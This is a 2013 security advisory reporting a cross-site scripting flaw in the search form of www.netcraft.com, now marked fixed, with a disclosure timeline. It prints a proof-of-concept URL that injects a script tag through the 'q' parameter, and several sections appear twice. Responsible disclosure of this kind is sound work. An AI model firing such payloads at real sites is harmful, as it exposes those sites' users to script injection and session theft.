SSCHADV2013-008 - www.netcraft.com - Search Form Cross-site Scripting vulnerability
Advisory:
|
www.netcraft.com – Search Form Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-008
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on www.netcraft.com
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The ‘q’-Parameter in the Search Form on www.netcraft.com is prone to a XSS vulnerability
======================
PoC-Exploit
======================
// IE8 & IE 10 & Aurora 8.0
http://www.netcraft.com/search/?q=127.0.0.1"></iframe><script>alert(document.domain)</script>&submit=Search&submit=Search
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
12-May-2013 – vendor informed by email
13-May-2013 – feedback from vendor
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.netcraft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-008.txt
PoC-Exploit
======================
// IE8 & IE 10 & Aurora 8.0
http://www.netcraft.com/search/?q=127.0.0.1"></iframe><script>alert(document.domain)</script>&submit=Search&submit=Search
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
12-May-2013 – vendor informed by email
13-May-2013 – feedback from vendor
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.netcraft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-008.txt
Comments
Display comments as Linear | Threaded